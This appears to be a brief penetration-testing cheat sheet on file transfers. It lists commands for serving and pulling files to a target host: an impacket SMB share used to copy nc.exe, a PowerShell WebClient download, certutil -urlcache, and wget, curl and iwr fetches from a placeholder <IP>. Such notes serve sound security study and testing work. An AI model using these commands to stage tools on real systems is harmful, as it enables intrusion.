File Transfers
SMB Server
impacket-smbserver share . -smb2support -user user -password teste321net use \\<smbserver>\share /USER:user teste321
copy \\<smbserver>\share\nc.exe .HTTP
python -m SimpleHTTPServer 80
service apache2 startpowershell -c "(new-object System.Net.WebClient).DownloadFile('http://<IP>/file.exe','C:\Users\user\Desktop\file.exe')"
iwr -uri http://<IP>/file -Outfile file
wget http://<IP>/file -O file
curl http://<IP>/file -o file
certutil -urlcache -f http://<IP>:803/ok.exe ok.exe wget http://<IP>/file
curl http://<IP>/file > filePure-FTPd
tftp
scp
Last updated
